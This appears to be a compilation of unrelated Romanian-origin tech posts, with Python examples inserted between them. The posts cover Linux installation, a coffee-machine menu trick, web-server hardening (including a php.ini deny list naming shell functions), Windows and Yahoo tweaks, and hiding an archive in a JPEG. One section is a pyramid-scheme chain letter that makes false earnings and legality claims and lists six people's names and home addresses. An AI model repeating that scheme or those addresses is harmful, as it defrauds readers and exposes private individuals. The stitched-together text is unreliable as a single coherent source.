Linux Installation

Installing the system

So you have decided to install Linux on your computer? Very good. For this you will need:

1. a computer (I assume you have one, otherwise how would you be reading this page?!)
2. a bootable CD with a Linux distribution
3. a good program for partitioning the hard disk, such as Partition Magic
4. a blank floppy disk
5. time
6. something to eat and drink (don't laugh, it is quite important!)

The installation itself consists of several stages:


Partitioning

If you already have Windows installed on the computer and do not want to give it up completely, you will have to create a new partition on the hard disk. Don't be afraid, it is simple and you don't need a university degree to do it. The new partition is needed because Linux and Windows differ greatly in how they access the hard disk and how they manage files. Most Linux distributions come on a CD together with a partitioning program, but I would recommend using "Partition Magic": it is the most comfortable to use, with an intuitive and very simple interface. With this program you will create 2 new partitions: "LinuxExt" and "LinuxSwap".

LinuxExt - Linux extended. This is where the entire operating system will live. If you want to install the full version of the OS, you will need approximately 1.5 GB, plus disk space for temporary files and other programs. Keep in mind, though, that a "full" installation means installing a web server, FTP server, news server and so on. I don't think you will need any of that on your home computer. For example, on my computer Linux takes up around 280 MB. During installation you will be asked to select which components you want installed, but more about that below. There are even compact versions of the system that boot from 3 floppy disks, 2 of which contain software rather than the operating system itself! You can find it here.

Linux Swap - traditionally, the size of this partition should be twice the amount of RAM you have, but if you have over 128 RAM, the need for a swap partition disappears.



Installation

For the installation you will need as much information as possible about your hardware. In Windows, look in My Computer and find out as much as you can about your sound card, video card, modem, etc. (if you have an internal modem, you may not be able to use it under Linux).
Let's hope you managed to partition your hard disk successfully without completely formatting the Windows partition (although that would not be a great tragedy :-). I think you are ready for the big event. Ask anyone who might get in your way to walk on tiptoe.

The disk you are going to install Linux from should be bootable. For your computer to be able to start the installer from it, you have to play a little with the BIOS settings so that the CD-ROM is read first at boot. I think you have already done this when you had the "luck" of installing Windows. Restart the computer, insert the bootable CD and wait for the Linux installer to start. Now or never.
On startup, the installer runs a series of tests to determine the computer's hardware configuration. After that, your distribution's logo may appear, followed by some extremely simple questions such as your language, keyboard type, mouse, etc. (Romanian is available too :-)). I don't think anyone will have problems here.



Setting the mount point

Small problems may arise when choosing the partition on which you want to install Linux, in a window titled "Disk Setup". It lists the partitions that exist on the computer. You should see something like this:

Mount point  Device  Requested  Actual  Type
             dev1    XX Mb      YY Mb   Win95
             dev2    XX Mb      YY Mb   Linux Swap
             dev3    XX Mb      YY Mb   Linux native

Don't despair if what you see on screen differs a little from the table above; the main thing is to get the idea.

hda1 is the partition on which your much-loved Windows is installed :-). But I think that's clear, isn't it? I assume you have all finished 9 grades.

Here you have to choose the partition (Device) on which Linux will be installed. To do that, select the partition labelled "Linux Native" (hda3 in our example) and press 'Space'. In the window that appears, enter '/' as the mount point and press OK. By doing this you have specified that the root directory is to be mounted on the Linux Native partition.

BE CAREFUL NOT TO CHOOSE ANY PARTITION OTHER THAN 'LINUX NATIVE', AS QUITE A FEW PEOPLE HAVE DONE!!!

Next comes a dialog asking which partition to format. Select the partition that holds Linux Native, '/dev/hda3' in the example above. Again, be very careful not to format a different partition!



Selecting packages

After selecting the partition and formatting it, you have to specify what kind of installation this is: GNOME workstation, KDE workstation, server installation, or an upgrade of an older kernel. After that you have to select the individual packages. If you deselect something that is indispensable to the system, you will be warned, so that your system can work without problems or errors (not like... you know who!). Press OK and the installation will begin.




Configuring services

After the packages are copied to the hard disk, you will be invited to configure X-Windows (the graphical interface for Linux, called X). Choose your monitor type and the type of graphics card you have; if your monitor is not in the list, choose something like "generic" and pick a lower resolution to start with; you can increase it later without problems.
Next comes mouse configuration (feeling scared? :-)). Simply choose "Generic PS/2 Mouse". After that, set the time and the month (ask someone older, just to be sure :-).
You will also be asked whether you want the graphical interface, X-Windows, to be the default. If you are a beginner with a capital 'B', select this option; if not, you can start the graphical interface at any time with the 'startx' command. The last thing left is to configure a printer.




Users

Linux is a multi-user system. Although you will most likely be using the computer on your own, for your own convenience it is a good idea to create several user accounts. First of all, an 'administrator' account (root, super-user), the one with the highest privileges on the system. You will use this account to maintain and administer the system. However, having absolute rights on the system makes it easy for beginners to destroy it, which is why it is recommended to create a user account with limited rights that will keep you from doing stupid things. You can return to 'super-user' status at any moment with the 'su' command. Choose a 'root' password. For example, my root password is 'bugmafia', that is, something very simple, because I trust the people in my family :-))))). I don't think excessive fits of paranoia are called for; I don't think there are very many people who would sell their soul to break into your system. Attackers can do far nastier things to your system without having the faintest idea of your administrator password. So it is the administration that counts, not its password. After configuring the root account, you will be invited to create a less privileged account; this is the account to use normally, especially when you are on the Net.





Booting

The final phase is choosing how you want Linux to start. The most convenient option would be to configure LILO (that is, LInux LOad). In this case, a program is written to sector zero of the hard disk (from which the operating system is loaded) that offers, at start-up, the choice of loading Windows or Linux. At first glance this would be the most convenient method. And so it is, but if you reinstall Windows (once every 2 weeks in my case), it will write its own boot information to sector zero over LILO, erasing it. In other words, if you reinstall Windows you will no longer have access to Linux. The way out is to use a boot floppy from which Linux is started. When you want to use Linux, you simply insert the floppy at start-up and Linux starts from it (of course, you will have to play a little with the BIOS settings); when you want to use Windows (people do fall into sin now and then), you simply start the computer as before, but without the Linux floppy!



Restart & Enjoy

Restart the computer and change the BIOS settings so that the system boots from the floppy. Don't forget to insert the floppy. You will see a prompt like this:

LILO
Press 'Enter' (or wait 10 seconds) to boot your Red Hat System from /dev/hda3.
You may override your default kernel parameters by typing "Linux " if you like.

boot:


Press 'Enter' (or wait 10 seconds, if you are a very patient person :-)) and... Linux will start! Yeehaw!!! But don't shout too loud...

Coffee Machine Hack Tutorial

At work, at school, we have coffee machines, isn't that right, guys... well... it's simple... in general they are brought in by Germans... damn those Germans, what we did to them with VNC on their computers, they are usually slower-witted than all the other foreigners, so let's start learning how to trick that coffee machine...

Right, to begin with you have to pull the corner of the machine towards you a little (see the red arrow in the corner in the picture I uploaded), then press 4... and you are in the menu; let go of the corner. 1 is up, 2 is down... the rest you can figure out... right?

How to repair a scratched CD

If you have a scratched CD that no longer works but holds important data, you can repair it very simply and very cheaply.

You need:
A scratched CD
Two soft cloths
Toothpaste

Method:
Put a pea-sized amount of toothpaste on a soft cloth and rub the CD with a circular motion over its whole surface
The toothpaste fills the gaps made by the scratches, so the CD-ROM drive will be able to read the CD again
When you have finished rubbing the CD, take another soft, dry cloth and, using the same circular motion, clean off the remaining toothpaste
Now the CD is usable again

Securing a web server

I was talking with someone about securing a web server and I prepared a list of suggestions.
If it were my server, I would do the following:

1. I would check weekly whether new versions have appeared for the applications I have installed (cpanel, phpbb, wordpress...)
the best thing is to subscribe to the mailing lists of the respective projects and be notified instantly when a security fix is released.

2. I would set a strong password on all administration services (cpanel, mysqladmin, ...)
http://strongpasswordgenerator.com/

3. even better, I would restrict access to these services to certain IP addresses only (from the firewall, it's simple),
so that I have access only from the IPs I use.

4. I would move ssh to another port. if it stays on port 22 everyone attacks it and at some point they may get lucky.

5. I would close all ports that are not needed.
For a web server only 80 and 443 are needed (possibly 53 for DNS and 25 for SMTP mail)

Possibly, if I have ports that I want to use from time to time from other IPs:
I use port knocking http://www.portknocking.org/ for those ports.

the basic idea here is that you define sequences of events which cause ports to be opened/closed.
the events can be knocks on the firewall (e.g. you send a packet to port 3, then to 5, then ...)
when the sequence matches, I open the port. when I no longer need it, I close it.

6. configure apache not to show directory contents
http://www.ducea.com/2006/06/26/apac...ctory-indexes/
an incredible number of problems come from this.

7. I would install mod_security and configure it to log POSTs.
this can take up a lot of space but it is worth it. if you have problems you see everything the attacker did.
http://www.modsecurity.org/ - mod_security is a very good application firewall, and even if you have vulnerable applications it makes the vulnerabilities very hard to exploit. (even impossible in some cases)

8. I would install php with the Suhosin patch
http://www.hardened-php.net/

9. I would configure php.ini (the basics)
http://www.conftool.net/en/technical...ity_hints.html
http://www.php.net/magic_quotes

magic_quotes_gpc = On
register_globals = Off
disable_functions = show_source, system, shell_exec, passthru, phpinfo, proc_open, proc_nice
allow_url_fopen = Off
allow_url_include = Off
display_errors = Off
open_basedir = "/var/www"

10. I would use a host-based intrusion detection system (such as tripwire, samhain, aide)
http://en.wikipedia.org/wiki/Host-ba...tection_system
http://sourceforge.net/projects/tripwire/
http://sourceforge.net/projects/aide

these are simple to use. you configure them to index a directory and then to check regularly whether there are changes in the structure
(a new file has appeared, the content of another file has been modified). you can instantly catch defacements, someone uploading a shell, ...
they can be configured to send you email when changes appear. very useful.

11. I would enable selinux
it can save you in a lot of 0day cases
https://wiki.ubuntu.com/SELinux

12. and finally I would also use AppArmor
https://wiki.ubuntu.com/AppArmor
or systrace (for OpenBSD)
http://www.citi.umich.edu/u/provos/systrace/

AppArmor is a super brilliant thing. The original idea came from OpenBSD, from systrace.
You define a file/profile for each application, specifying exactly what that application may do (write to this file, open this port, ...)
For the basic applications (apache, ssh) there are already predefined profiles that can be reused.
If a 0day appears, the exploit cannot do anything because it is restricted.

That's about it for now.
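
The port-knocking idea from point 5, as an added example in Python (not part of the original post and not the code of any knocking daemon): a per-source state machine that opens a port only when the knocks arrive in order and within a time window. The sequence, the window, and the log line format are assumptions made up for this sketch.

```python
import re

KNOCK_SEQUENCE = (7000, 8000, 9000)  # assumed secret sequence (constructed)
WINDOW_SECONDS = 10                  # the whole sequence must arrive within this window

# Constructed log format for this example: "<epoch> SRC=<ip> DPT=<port>"
LOG_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?) SRC=(?P<src>\S+) DPT=(?P<dpt>\d+)$")

# Constructed sample: one correct knock, one in the wrong order, one too slow.
SAMPLE_LOG = """\
1000.0 SRC=203.0.113.5 DPT=7000
1000.5 SRC=198.51.100.9 DPT=7000
1001.0 SRC=203.0.113.5 DPT=8000
1001.5 SRC=198.51.100.9 DPT=9000
1002.0 SRC=203.0.113.5 DPT=9000
1002.5 SRC=198.51.100.9 DPT=8000
2000.0 SRC=192.0.2.77 DPT=7000
2001.0 SRC=192.0.2.77 DPT=8000
2020.0 SRC=192.0.2.77 DPT=9000
"""


class KnockTracker:
    """Tracks, per source address, how far through the knock sequence it is."""

    def __init__(self, sequence=KNOCK_SEQUENCE, window=WINDOW_SECONDS):
        self.sequence = tuple(sequence)
        self.window = window
        self._progress = {}   # src -> (index of next expected knock, time of first knock)
        self.allowed = set()  # sources for which the protected port is currently open

    def observe(self, ts, src, dport):
        """Feed one dropped-packet event; returns 'progress', 'open' or 'reset'."""
        idx, started = self._progress.get(src, (0, ts))
        if idx and ts - started > self.window:
            idx, started = 0, ts              # too slow: start over
        if dport == self.sequence[idx]:
            if idx == 0:
                started = ts
            idx += 1
            if idx == len(self.sequence):     # sequence complete: open the port
                self._progress.pop(src, None)
                self.allowed.add(src)
                return "open"
            self._progress[src] = (idx, started)
            return "progress"
        if dport == self.sequence[0]:         # wrong knock, but it may begin a new attempt
            self._progress[src] = (1, ts)
            return "progress"
        self._progress.pop(src, None)         # any other port wipes the progress
        return "reset"

    def close(self, src):
        """Close the port again once the source no longer needs it."""
        self.allowed.discard(src)


def replay(log_text, tracker=None):
    """Run the tracker over log lines; returns the tracker and (src, outcome) pairs."""
    tracker = tracker or KnockTracker()
    results = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        outcome = tracker.observe(float(m["ts"]), m["src"], int(m["dpt"]))
        results.append((m["src"], outcome))
    return tracker, results


if __name__ == "__main__":
    tracker, results = replay(SAMPLE_LOG)
    for src, outcome in results:
        print(src, outcome)
    print("open for:", sorted(tracker.allowed))
```

A static knock sequence can be replayed by anyone able to observe the traffic, so the opened port still needs its normal authentication behind it.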
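
The mechanism behind the integrity checkers from point 10, as an added example in Python (not part of the original post and not how tripwire, samhain or aide are implemented): index a directory once, then compare a later snapshot against that baseline. The web root and the file names are constructed in a temporary directory for the demonstration.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Index every file under root: relative path -> (SHA-256, permission bits)."""
    index = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if os.path.islink(path):
                # Record where a symlink points instead of following it.
                index[rel] = ("link:" + os.readlink(path), 0)
                continue
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            mode = os.stat(path).st_mode & 0o7777
            index[rel] = (digest.hexdigest(), mode)
    return index


def compare(baseline, current):
    """Report files that appeared, disappeared, or changed content/permissions."""
    old, new = set(baseline), set(current)
    return {
        "added": sorted(new - old),
        "removed": sorted(old - new),
        "modified": sorted(p for p in old & new if baseline[p] != current[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def demo():
    """Build a constructed web root, take a baseline, change it, and diff."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php echo 'welcome'; ?>")
        _write(root, "config.php", "<?php $db = 'example'; ?>")
        _write(root, ".htaccess", "Options -Indexes\n")
        _write(root, os.path.join("uploads", "logo.txt"), "constructed placeholder")
        baseline = snapshot(root)

        # Constructed changes of the kind the post mentions.
        _write(root, "index.php", "<h1>defaced</h1>")            # content modified
        _write(root, os.path.join("uploads", "shell.php"),        # new file appeared
               "<?php /* constructed placeholder */ ?>")
        os.remove(os.path.join(root, "config.php"))               # file removed
        os.chmod(os.path.join(root, ".htaccess"), 0o777)          # permissions changed

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

The baseline is only trustworthy if it is stored where the web server account cannot write to it, for example on another host or on read-only media.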

Yahoo Tricks

Some nice things you can do in Y!M
Some of you probably knew them already, but some probably did not

1) Change the Messenger title
Go to the folder where you installed Y!M
On my machine, for example, it is here
C:\Program Files\Yahoo!\Messenger
There, find the file ymsgr.ini
Open it and at the end of the text you find there, add this:
[app title]
Caption=WRITE WHATEVER YOU WANT HERE

2) Send a BUZZ en masse
In Messenger go to Preferences and choose Appearance there
Click the button labelled "Change Fonts & Colors"
Then press the "Use Default" button > "OK"
Then select the whole list and choose "Send an instant message"
In it you type:

3) Multiple Messenger instances via the Registry
Start->Run->regedit->HKEY_CURRENT_USER->Software->Yahoo->Pager->Test -> now right-click > New DWORD value -> name it: plural
Right-click it > Modify > enter a number there (e.g. 10)
Now you will be able to open 10 more Y!M instances

4) YMISTIC
This is a (RO)bot that has several uses
To access it, add ymistic to your Messenger list
DICTIONARY

Romanian > English
!dic/roen KEYWORD
English > Romanian
!dic/enro KEY WORD

WEATHER
!weather bucuresti

INTERNET
!lookup google.com

BIBLE
!bible/bor Mt 3,1-3

5) Hidden Smiley Plug-in
Install this plug-in: ymsgr:getplugin?&type=1&id=35c688d8-...&version=1.2.0
To use it, open a conversation with the person you want to talk to
In the top left corner there is a green button labelled Plug-ins
Click it, and on the right choose My Plug-ins
Press Start on the Smiley plug-in and now you have all the faces, including the hidden ones

6)...

10 settings for a more 'obedient' Windows

We are different. We like different things, we want to be unique, we try to avoid routine, or our tastes simply don't match. The same situation arises in the relationship between the user and the operating system. Windows comes in an unpolished, rough form, and not everyone is willing to accept it that way. Below we will look at a few useful changes that can make it more 'obedient'.

1. Starting Windows Explorer in the folder of your choice

Normally, Windows Explorer is set to go straight to the My Documents directory every time it is launched. To change this, right-click its icon and open Properties. Change the target field to "%SystemRoot%\explorer.exe /e, c:\". You can make it go straight to Games or any other directory. For example, if you want to be taken to My Computer every time, all you have to do is enter the following target field: "%SystemRoot%\Explorer.exe /e,".

2. Teach Windows to log on to your account automatically

Many of you may have noticed that, at every Windows start-up, it no longer goes straight into your user account. This happens because of the latest updates from Microsoft, specifically the one for .Net Framework, which automatically creates a new user account named ASP.NET. Because of it, automatic logon is blocked.

Of course, many of you will think the simplest methods would be to give up the update in question or to delete the ASP.NET account. Here is an even simpler method to solve the problem: go to Start->Run and type "control userpasswords2". A window with the list of users appears; select the desired account and untick the option "Users must enter a user name and password to use this computer". Unfortunately, this solution only works for Windows XP Professional owners.

3. In a hurry and the computer won't shut down any faster?

To optimise the Shut Down sequence go to Start->Run and type "regedit". Look for the following key: [HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]. Once you have found it, set the value ClearPageFileAtShutdown to 0.

Also, if you are a Windows XP Professional user, you can obtain the same effect by opening the Group Policy Editor with Start->Run->"Secpol.msc".

4. After using Windows for a while with a lot of programs running at once, you have probably realised how useful the "Show Desktop" icon is. Unfortunately, some time ago you removed it from Quick Launch. How do you put it back?

Use the following method:
Go to Start->Run and type the command "regsvr32 /n /i:U shell32". The icon will reappear instantly in Quick Launch.

5. Remove the user name and its picture from the Start menu

Many people complain about this, finding the display of this information in the Start menu annoying. The way to get rid of it (without disabling the Welcome Screen and Windows XP Themes) is as follows:
Navigate to "C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures", where you will find a BMP file bearing your user name, something like "smith.bmp". Rename that file to "smith2.bmp". The next step is to rename the directory "C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures" to "Old_Default Pictures". To remove the user name, use Registry Editor (Start->Run->regedit) and look for the key [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]. In the list on the right set the value NoUserNameInStartMenu to 1. After a restart, the user name and picture will no longer be displayed.

6. Does Windows forget your Folder Options settings?

It's true. Some people are more meticulous and customise their folders to their own aesthetic taste, but Windows cannot remember more than 400 customised folders. Still, we can teach it to remember more: using Registry Editor, go to the keys listed below and change BagMRU Size to 5000 (or up to 8000). Do not exceed 8000, the programmers recommend.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam]

7. Make the command prompt start in the location you want.

It is well known that the "cmd" command from Run launches the command prompt directly in the user's "home" folder ("C:\Documents and Settings"). To change this default, use regedit to go to the key [HKEY_CURRENT_USER\Software\Microsoft\Command Processor] and look for the value "Autorun". If it is missing, create a new REG_SZ and enter the desired folder there, preceded by CD (as in MS-DOS commands). If you leave just CD, it will start directly in "C:". You can also type "CMD /?" to see detailed information about the command's parameters.

8. Sometimes you cannot use 'preview' mode for GIF, JPEG or HTML files in the Display Properties box.

Type "REGSVR32 /i SHIMGVW.DLL" and "REGSVR32 /i MSHTML.DLL" in Start->Run to fix this shortcoming.

9. Delete the information about previous searches to protect your privacy.

Use Registry Editor and look for [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer ExplorerBars FilesNamedMRU]. There you will be able to delete the previous searches.

10. Your zip archiving program has expired and you want to go back to the zip archive handling that Windows XP offers. Unfortunately, the zip extension was left unassociated after uninstalling the program you used before.

To reassociate .zip files with the unarchiver built into Windows, go to Start->Run and type "REGSVR32 ZIPFLDR.DLL" or "cmd /c assoc .zip=CompressedFolder".

Bear in mind that, because of the large number of settings and changes that occur in the Windows operating system, we cannot guarantee that the methods mentioned above will work exactly as described

HOW to make money on the net!

MAKE MONEY IN JUST 3 WEEKS!!!!!!!

Description:
THE SIMPLEST AND MOST PROFITABLE LEGAL METHOD OF MAKING MONEY FOR ROMANIANS! MONEY QUICKLY AND SAFELY ON THE INTERNET. EVERYONE WHO HAS TRIED IT SO FAR IS VERY SATISFIED. IT REALLY WORKS.

It is entirely up to you whether you read this page or not; all I can say is that 10 minutes of reading can change your life, and your wallet. It is entirely up to you.
YOU CAN MAKE MONEY EASILY AND QUICKLY! Believe me: I have tried every possible (legal) method. This is the EASIEST and FASTEST way. You can make a pile of money, quickly and legally. It works! It's tested! All you have to do for now is read the text carefully and to the end.

Some time ago I was browsing the Internet aimlessly (probably just as you are doing now) when I came across an article similar to this one, which said that I could earn millions in just a few weeks with an investment of only 60.000 lei. I was slightly sceptical at first, yet... I kept reading.
The article said that you have to send 1 RON (10.000 old lei) to each of the 6 addresses mentioned in the article. Then you put your name and address at the end of the list, in 6th position, and publish the article on at least 200 forums (sites with ads on the Internet) or by e-mail to as many addresses as possible. As simple as that!

After I analysed the matter and discussed it with a few friends, I decided to try. After all, what did I have to lose apart from 60.000 lei and 6 stamps?
As is only normal, at first I was sceptical and even worried about the legal side. So I asked at PTTR and they confirmed to me that it is indeed legal.
So I made the tiny investment of 60.000 lei and did what was necessary. Surprise! Guess what happened! Within 7 days I started receiving money in my mailbox.
I was stunned! I thought it would probably stop soon, but the money kept coming! In the first week I received 370.000 lei. At the end of the second I had 1.090.000. By the third week I had collected 25.470.000 lei! And the money keeps coming in fast. It was certainly worth spending the 60.000 lei and the 6 stamps (I have spent far more playing the lottery and bingo!). Let me tell you how it works and, above all, why it works. First of all, I advise you to save the article to your hard disk or print it so that you have it at hand. How?

STEP 1: Take 6 sheets of paper and write on each of them: "I HAVE ADDED MYSELF TO YOUR LIST", so that whoever receives the envelope adds you to the lists they are going to post, and so your address will appear on hundreds and hundreds more forums; then fold each sheet (so that it fits into an envelope). Now take 6 banknotes of 1 new leu (10.000 old lei) and put ONE in EACH of the 6 sheets (so that it cannot be seen through the envelope and stolen), then put EACH sheet in ITS OWN ENVELOPE and seal the envelopes.
You should now have 6 sealed envelopes, with your name and address on them (as the sender, so that it continues to end up on forums!), each containing a sheet of paper and a banknote of 1 new leu (10.000 old lei). Now send the envelopes to the following addresses:

1) Radu Ion , str. Lam?itei , nr.58 , sector4 , Bucuresti , cod 040552

2) Patras Ovidiu , str.Florilor , nr.1 , bl.22 , sc.b , et.4 , ap.16 , Loc.Husi , Jud.Vaslui , cod 735100

3) Lechintan Valeriu , str. P-ta Karl Liebknecht , nr.7-8 , Sc. B , Ap. 3 , Cluj-Napoca , cod 400263

4) Baragau Alexandra , str. Cetatuia , nr. 1 , bl. M21 , sc. 4 , et. 9 , ap. 253 , sector 6 , Bucuresti

5) Catanoiu Alexandra, str. Aleea Lalelelor, nr. 1 , bl. FB7, sc. B, et. 3, ap. 15, Slatina, jud. Olt, cod 230032

6) Petrina Emanuel , str. Prelungirea Bradului , bloc 123 sc. C ap 1 Bacau Bacau cod 600367

STEP 2: Now delete number 1 from the list and move the other addresses up one position (6 becomes 5, 5 becomes 4, 4 becomes 3, etc...). Position 6 thus becomes free: fill this position in with YOUR full name and address.

You must understand very clearly that IF YOU PUT YOURSELF IN ANY POSITION OTHER THAN THE 6th, you will receive far less money, because the multiplication factor decreases. To get into the game, you have to send the envelopes as quickly as possible and then post the ads. To strengthen trust in the game, you must NOT CHEAT and you must SEND THE ENVELOPES, because otherwise you exclude yourself from the circuit by sowing mistrust.

STEP 3: Change whatever you like but, as far as possible, try to keep the article as close to the original as you can. Now publish the ad on as many forums and newsgroups as possible (there are loads of them on the internet; I have added plenty of addresses below myself; in addition, I also send it to the e-mail addresses I know, to help my relatives and friends earn money too).

200 is all you need, but the more places you publish in, the more money you will earn! There is no need to retype this whole article; you can select the text with the mouse cursor and copy it into the computer's memory ('Copy' from the 'Edit' menu); open an empty file with 'notepad' ('File'...'New') and paste the text so that you can add your name in 6th position ('Edit'...'Paste'); save the file with the .txt extension. Now go on the Internet to the addresses I am giving you, and if you want more newsgroups (on-line forums, message boards, chat sites, discussion sites), Romanian ones of course, use search engines! I suggest you use as attractive a title as possible for the subject, because that is what visitors to these sites will see.
DONE! Good luck with the work! It shouldn't take you more than 30 seconds per newsgroup!

REMEMBER: MORE NEWSGROUPS MEANS MORE MONEY! ALL IT TAKES IS A MINIMUM OF 200! You will start receiving money in your mailbox a few days after you have sent the envelopes and posted the ad! You may want to rent a post-office box at PTTR because of the large number of letters you will receive.
Now let's do a simple calculation. Out of the MINIMUM 200 postings I made, let's say I receive 5 replies (a VERY, VERY small example!).
So I have earned 50.000 lei with my name in 6th position. Now each of the 5 people who have just sent me a letter in turn publishes the MINIMUM of 200 articles with my name in 5th position, and they too receive 50.000 lei each. I thus receive 5x5x10.000 lei = 250.000 lei. Continuing the example with this small number (5) of people replying to the article, I earn 1.250.000 lei with my name in 4th position, 6.250.000 with my name in 3rd position, 31.250.000 lei in 2nd position and ...
YES: 156.250.000 LEI with my name in first position. It seems AMAZING! But it is necessary for every participant to publish this article a MINIMUM of 200 times!
And all with an initial investment of 60.000 lei and 6 stamps. When your name is no longer on the list you can repeat the procedure: take the latest version of the article and send 10.000 lei to each of the addresses on the list, putting your name in 6th position. Now publish the article again a MINIMUM of 200 times.

You realise that every day thousands of people go on the Internet and read these articles JUST AS YOU ARE READING NOW! So you can afford 60.000 lei to see whether it really works, can't you? I think so... Some have asked, pessimistically, "but what if people get fed up and nobody sends any money any more?" I ask myself, realistically: what are the chances of that happening when 20-50.000 new users join the Internet EVERY DAY, very many of whom read ads like this and are willing to try, eager as they are for some extra income?

PLAY HONESTLY AND FAIRLY AND YOUR ADDRESS WILL END UP ON THOUSANDS OF FORUMS, SO YOU WILL RECEIVE THOUSANDS OF ENVELOPES! EVERY DAY HUNDREDS OR THOUSANDS OF PEOPLE VISIT THE FORUM! YOU CAN ONLY GAIN! THE GAME IS BASED ON A WELL-KNOWN LAW OF ECONOMICS, NAMELY THE LAW OF MULTIPLICATION, WHICH I THINK YOU CAN UNDERSTAND. SO, IF YOU PLAY FAIR AND SEND THE ENVELOPES, YOUR ADDRESS WILL APPEAR ON MANY SITES AND YOU WILL RECEIVE FAR MORE MONEY THAN YOU THINK NOW! I personally have joined and seriously taken part in this game-business twice so far, and each time I earned an unexpectedly large amount of money, so now I am starting over and playing a third time. GOOD LUCK to you too!

P.S. IMPORTANT: YOU WILL MEET PEOPLE WHO DO NOT AGREE WITH THIS AND WHO DO NOT HAVE THE COURAGE TO TRY TO GET RICH INTELLIGENTLY. THEY ARE CONTENT JUST TO SWEAR (THEY CAN'T DO MORE THAN THAT, oh well). YOU JUST HAVE TO IGNORE THEM. AS I AM DOING NOW, PLAY TOO AND YOU WILL SEE HOW THE ENVELOPES START ARRIVING just a few days after sending the envelopes and publishing this article on the internet and to the e-mail addresses of people you know. IF YOU HAVE FAITH AND PERSEVERE, YOU WILL THANK ME ON BEHALF OF THOSE WHO DO NOT PLAY AS WELL. The pessimists are wasting their breath, I AM RECEIVING DOZENS OF ENVELOPES WITH MONEY AND I WILL KEEP PLAYING!

Hide files in a .jpg

So let's begin....

Gather the files you want to hide plus the .jpg (the image) and put them in one folder.
I will use C:\New Folder.
~My image will be named Crazy.jpg.
~The file I am hiding will be NET.txt. :P

The files you want to "inject" into the image must be archived with WinRAR in .rar or .zip format.
In our case we archive NET.txt
Code:

Right-click NET.txt -> Add to archive -> at Archive name enter (e.g. crazynet.rar)

Open Command Prompt by going to:
Code:

Start -> Run -> cmd

In Command Prompt, go to the folder where the files are ....

Code:

cd C:\New Folder

Now type:
Code:

copy /b crazy.jpg + crazynet.rar crazy.jpg

This file looks like a JPEG, and actually is a JPEG, but it also contains the file you put in it.

To view/extract the file placed in the .jpg you have 2 options:

1. Change the extension from crazy.jpg to crazy.rar
2. Leave the extension as .jpg and right-click -> Open with -> WinRAR archiver
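
The trick works because a JPEG decoder stops at the end-of-image marker while archive tools search the file for their own signature, so the appended bytes are invisible to image viewers. The following added example (not part of the original tutorial) walks the JPEG segments to find the real end of the image and reports archive signatures in whatever follows; the function names, signature table and sample bytes are constructed for illustration.

```python
import struct

# Archive signatures to look for after the image data (constructed list).
ARCHIVE_SIGNATURES = {
    b"Rar!\x1a\x07": "rar",
    b"PK\x03\x04": "zip",
    b"7z\xbc\xaf\x27\x1c": "7z",
}


def jpeg_end_offset(data: bytes) -> int:
    """Return the offset just past the JPEG end-of-image (EOI) marker.

    The segments are walked one by one instead of searching for the last
    FF D9, because appended data can contain FF D9 bytes of its own.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte in front of a marker
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:                 # EOI: the image ends here
            return pos
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:
            continue                       # stand-alone markers have no length
        if pos + 2 > len(data):
            break
        (seg_len,) = struct.unpack(">H", data[pos:pos + 2])
        if seg_len < 2:
            raise ValueError(f"bad segment length at offset {pos}")
        pos += seg_len
        if marker == 0xDA:                 # SOS: entropy-coded data follows
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                # FF 00 is a stuffed byte and FF D0..D7 are restart markers;
                # any other FF xx starts the next real marker.
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker found")


def scan_jpeg(data: bytes) -> dict:
    """Report bytes that follow the image and any archive signature in them."""
    end = jpeg_end_offset(data)
    trailer = data[end:]
    found = []
    for magic, kind in ARCHIVE_SIGNATURES.items():
        idx = trailer.find(magic)
        if idx != -1:
            found.append((kind, end + idx))
    return {
        "image_bytes": end,
        "trailing_bytes": len(trailer),
        "archives": sorted(found, key=lambda item: item[1]),
    }


def build_sample_jpeg() -> bytes:
    """Constructed, structurally valid JPEG skeleton (not a real picture)."""
    soi = b"\xff\xd8"
    app0 = (b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00"
            + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    entropy = b"\x12\xff\x00\x34\xff\xd0\x56"   # includes FF 00 and RST0
    return soi + app0 + sos + entropy + b"\xff\xd9"


SAMPLE_CLEAN = build_sample_jpeg()
# Constructed stand-in for the output of "copy /b image + archive": a RAR
# signature plus filler that happens to contain FF D9.
SAMPLE_POLYGLOT = SAMPLE_CLEAN + b"Rar!\x1a\x07\x00" + b"\xff\xd9" + b"constructed payload"

if __name__ == "__main__":
    for name, blob in (("clean", SAMPLE_CLEAN), ("polyglot", SAMPLE_POLYGLOT)):
        print(name, scan_jpeg(blob))
```

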